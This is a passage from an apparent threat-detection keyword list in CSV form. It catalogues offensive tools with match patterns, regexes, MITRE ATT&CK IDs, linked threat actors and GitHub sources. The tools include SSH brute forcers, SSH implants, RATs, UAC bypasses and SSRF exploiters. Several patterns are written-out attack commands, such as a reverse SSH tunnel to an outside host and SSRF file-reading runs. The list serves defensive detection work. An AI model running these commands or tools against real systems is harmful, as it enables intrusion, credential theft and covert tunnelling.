tuns.sh*",".{0,1000}ssh\s\-p\s2222\stuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","60138" "*ssh -R *:80:localhost:8000 tuns.sh*",".{0,1000}ssh\s\-R\s.{0,1000}\:80\:localhost\:8000\stuns\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","60140" "*ssh_key_privesc(payload*",".{0,1000}ssh_key_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","60143" "*SSH_Keylogger_Stub.exe*",".{0,1000}SSH_Keylogger_Stub\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60144" "*ssh_write_privesc(payload*",".{0,1000}ssh_write_privesc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","60145" "*SSH-2.0-OpenSSH_6.7p2*",".{0,1000}SSH\-2\.0\-OpenSSH_6\.7p2.{0,1000}","offensive_tool_keyword","OpenSSH Trojan","openssh trojan - non existing banner in official OpenSSH - only observed in compromised routers (APT28)","T1071 - T1059 - T1021 - T1065 - T1090 - T1563 - T1132 - T1078","TA0002 - TA0005 - TA0011","Moobot OpenSSH Trojan","APT28","Malware","https://www.ic3.gov/Media/News/2024/240227.pdf","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60146" "*ssh2john *",".{0,1000}ssh2john\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60147" "*ssh2john.py*",".{0,1000}ssh2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60148" "*sshamble scan *",".{0,1000}sshamble\sscan\s.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60149" "*sshamble*badkeys*",".{0,1000}sshamble.{0,1000}badkeys.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - 
timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60150" "*sshamble/badkeys*",".{0,1000}sshamble\/badkeys.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60151" "*sshamble-main.zip*",".{0,1000}sshamble\-main\.zip.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","60152" "*ssh-auditor*",".{0,1000}ssh\-auditor.{0,1000}","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","N/A","7","611","84","2023-12-18T21:46:18Z","2016-11-08T22:47:38Z","60153" "*sshbrute.py*",".{0,1000}sshbrute\.py.{0,1000}","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","60154" "*sshBruteForce.exe*",".{0,1000}sshBruteForce\.exe.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","60155" "*SSHBruteForce.py*",".{0,1000}SSHBruteForce\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","60156" "*SSH-Hijack (reptyr)*",".{0,1000}SSH\-Hijack\s\(reptyr\).{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","60157" "*sshimpanzee --*",".{0,1000}sshimpanzee\s\-\-.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60158" 
"*sshimpanzee:127.0.0.1:*",".{0,1000}sshimpanzee\:127\.0\.0\.1\:.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60159" "*sshimpanzee-1.1-exp*",".{0,1000}sshimpanzee\-1\.1\-exp.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60160" "*sshimpanzee-main*",".{0,1000}sshimpanzee\-main.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","60161" "*sshkey_persistence.*",".{0,1000}sshkey_persistence\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60163" "*ssh-keygen not found in PATH, cannot escalate using SSH key*",".{0,1000}ssh\-keygen\snot\sfound\sin\sPATH,\scannot\sescalate\susing\sSSH\skey.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","60164" "*sshLooterC*",".{0,1000}sshLooterC.{0,1000}","offensive_tool_keyword","sshLooterC","script to steal password from ssh - It's the C version of sshLooter. which was written in python and has a lot of dependencies to be installed on the infected machine. Now with this C version. 
you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","N/A","3","266","86","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z","60165" "*ssh-mitm*",".{0,1000}ssh\-mitm.{0,1000}","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","N/A","10","1657","203","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z","60166" "*sshmon*hunt*",".{0,1000}sshmon.{0,1000}hunt.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","60167" "*sshmon*kill*",".{0,1000}sshmon.{0,1000}kill.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","60168" "*ssh-putty-brute -*",".{0,1000}ssh\-putty\-brute\s\-.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","0","N/A","N/A","9","3","285","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z","60169" "*ssh-putty-brute.ps1*",".{0,1000}ssh\-putty\-brute\.ps1.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - 
TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","N/A","9","3","285","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z","60170" "*SSH-PuTTY-login-bruteforcer*",".{0,1000}SSH\-PuTTY\-login\-bruteforcer.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","N/A","9","3","285","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z","60171" "*ssh-shellhost.exe*",".{0,1000}ssh\-shellhost\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","60172" "*SSHSnake.log*",".{0,1000}SSHSnake\.log.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","60173" "*SSH-Snake-main*",".{0,1000}SSH\-Snake\-main.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","60174" 
"*sshuttle -r *0.0.0.0/24*",".{0,1000}sshuttle\s\-r\s.{0,1000}0\.0\.0\.0\/24.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60178" "*SspiUacBypass*",".{0,1000}SspiUacBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","60190" "*SspiUacBypass.cpp*",".{0,1000}SspiUacBypass\.cpp.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","60191" "*SspiUacBypass.exe*",".{0,1000}SspiUacBypass\.exe.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","60192" "*SspiUacBypassBOF*",".{0,1000}SspiUacBypassBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","60193" 
"*SspiUacBypass-main*",".{0,1000}SspiUacBypass\-main.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","60194" "*SSploitEnumeration*",".{0,1000}SSploitEnumeration.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60195" "*SSploitEnumerationDomain*",".{0,1000}SSploitEnumerationDomain.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60196" "*SSploitExecution_DynamicInvoke*",".{0,1000}SSploitExecution_DynamicInvoke.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60197" "*SSploitExecution_Injection*",".{0,1000}SSploitExecution_Injection.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60198" "*SSploitLateralMovement*",".{0,1000}SSploitLateralMovement.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60199" "*SSploitPersistence*",".{0,1000}SSploitPersistence.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60200" "*SSploitPrivilegeEscalation*",".{0,1000}SSploitPrivilegeEscalation.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","60201" "*sspr2john.py*",".{0,1000}sspr2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60202" "*--ssrf --gopher --encode --scan-action 
filter-bypass*",".{0,1000}\-\-ssrf\s\-\-gopher\s\-\-encode\s\-\-scan\-action\sfilter\-bypass.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","60203" "*ssrfmap -r *.txt -p id -m readfiles*portscan*",".{0,1000}ssrfmap\s\-r\s.{0,1000}\.txt\s\-p\sid\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60204" "*SSRFmap*",".{0,1000}SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. 
SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","60205" "*ssrfmap.py*",".{0,1000}ssrfmap\.py.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","60206" "*SSSDKCMExtractor.py*",".{0,1000}SSSDKCMExtractor\.py.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","146","15","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z","60207" "*StackCrypt-main*",".{0,1000}StackCrypt\-main.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60208" "*StackEncrypt.cpp*",".{0,1000}StackEncrypt\.cpp.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60209" 
"*StackEncrypt.exe*",".{0,1000}StackEncrypt\.exe.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60210" "*StackEncrypt.sln*",".{0,1000}StackEncrypt\.sln.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60211" "*StackEncrypt.vcxproj*",".{0,1000}StackEncrypt\.vcxproj.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","60212" "*stage.obfuscate*",".{0,1000}stage\.obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","60213" "*stage_smartinject*",".{0,1000}stage_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - 